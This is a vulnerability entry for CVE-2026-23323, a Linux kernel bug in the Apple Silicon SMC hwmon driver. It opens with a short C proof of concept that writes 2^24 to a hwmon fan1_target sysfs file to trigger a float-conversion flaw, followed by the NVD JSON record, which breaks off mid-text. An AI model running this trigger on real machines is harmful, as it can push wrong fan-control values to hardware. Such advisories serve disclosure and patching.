CVE-2026-23323

#include <stdio.h> #include <stdlib.h> #include <fcntl.h> #include <unistd.h> /* * PoC for CVE-2026-23323 * This PoC attempts to trigger the float conversion bug * in macsmc_hwmon_write_f32 by writing a large value * to the hwmon sysfs interface. */ int main() { const char* path = "/sys/class/hwmon/hwmonX/fan1_target"; // Replace X with actual hwmon id int fd = open(path, O_WRONLY); if (fd < 0) { perror("Failed to open hwmon device"); return 1; } // Write a large value to trigger exponent logic bug (>= 2^24) const char* val = "16777216"; if (write(fd, val, sizeof(val)) < 0) { perror("Failed to write value"); } else { printf("Value written successfully. Check system logs for kernel panics or corruption.\n"); } close(fd); return 0; }

{"cve": {"id": "CVE-2026-23323", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-03-25T11:16:29.250", "lastModified": "2026-04-23T21:05:18.993", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nhwmon: (macsmc) Fix regressions in Apple Silicon SMC hwmon driver\n\nThe recently added macsmc-hwmon driver contained several critical\nbugs in its sensor population logic and float conversion routines.\n\nSpecifically:\n- The voltage sensor population loop used the wrong prefix (\"volt-\"\n instead of \"voltage-\") and incorrectly assigned sensors to the\n temperature sensor array (hwmon->temp.sensors) instead of the\n voltage sensor array (hwmon->volt.sensors). This would lead to\n out-of-bounds memory access or data corruption when both temperature\n and voltage sensors were present.\n- The float conversion in macsmc_hwmon_write_f32() had flawed exponent\n logic for values >= 2^24 and lacked masking for the mantissa, which\n could lead to incorrect values being written to the SMC.\n\nFix these issues to ensure correct sensor registration and reliable\nmanual fan control.\n\nConfirm that the reported overflow in FIELD_PREP is fixed by declaring\nmacsmc_hwmon_write_f32() as __always_inline for a compile test."}, {"lang": "es", "value": "En el kernel de Linux, la siguiente vulnerabilidad ha sido resuelta:\n\nhwmon: (macsmc) Corrige regresiones en el controlador hwmon SMC de Apple Silicon\n\nEl controlador macsmc-hwmon recientemente añadido contenía varios errores críticos en su lógica de población de sensores y rutinas de conversión de coma flotante.\n\nEspecíficamente:\n- El bucle de población del sensor de voltaje usaba el prefijo incorrecto ('volt-' en lugar de 'voltage-') y asignaba incorrectamente los sensores al array de sensores de temperatura (hwmon-&gt;temp.sensors) en lugar del array de sensores de voltaje (hwmon-&gt;volt.sensors). Esto llevaría a acceso a memoria fuera de límites o corrupción de datos cuando ambos sensores de temperatura y voltaje estaban presentes.\n- La conversión de coma flotante en macsmc_hwmon_write_f32() tenía una lógica de exponente defectuosa para valores &gt;= 2^24 y carecía de enmascaramiento para la mantisa, lo que podría llevar a que se escribieran valores incorrectos en el SMC.\n\nSoluciona estos problemas para asegurar un registro correcto de los sensores y un control manual fiable del ventilador.\n\nConfirma que el desbordamiento reportado en FIELD_PREP está solucionado declarando macsmc_hwmon_write_f32() como __always_inline para una prueba de compilación."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.19.1", "versionEndExcluding": "6.19.7", "matchCriteriaId": "8ACF56ED-6FE0-41DE-BECE-41134CC7BD44"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:6.19:-:*:*:*:*:*:*", "matchCriteriaId": "35C8A871-4971-433E-A046-FC9F7B7D190A"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc1:*:*:*:*:*:*", "matchCriteriaId": "F253B622-8837-4245-BCE5-A7BF8FC76A16"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc2:*:*:*:*:*:*", "matchCriteriaId": "4AE85AD8-4641-4E7C-A2F4-305E2CD9EE64"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc3:*:*:*:*:*:*", "matchCriteriaId": "F666C8D8-6538-46D4-B318-87610DE64C34"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc4:*:*:*:*:*:*", "matchCriteriaId": "02259FDA-961B-47BC-AE7F-93D7EC6E90C2"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc5:*:*:*:*:*:*", "matchCriteriaId": "58A9FEFF-C040-420D-8F0A-BFDAAA1DF258"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc6:*:*:*:*:*:*", "matchCriteriaId": "1D2315C0-D46F-4F85-9754-F9E5E11374A6"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:7.0:rc7:*:*:*:*:*:*", "matchCriteriaId": "512EE3A8-A590-4501-9A94-5D4B268D6138"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/5dd69b864911ae3847365e8bafe7854e79fbeecb", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/625ef35b70d3883fb9a41cd5a988e64dd3e447d6", "source": "4 ... (truncated)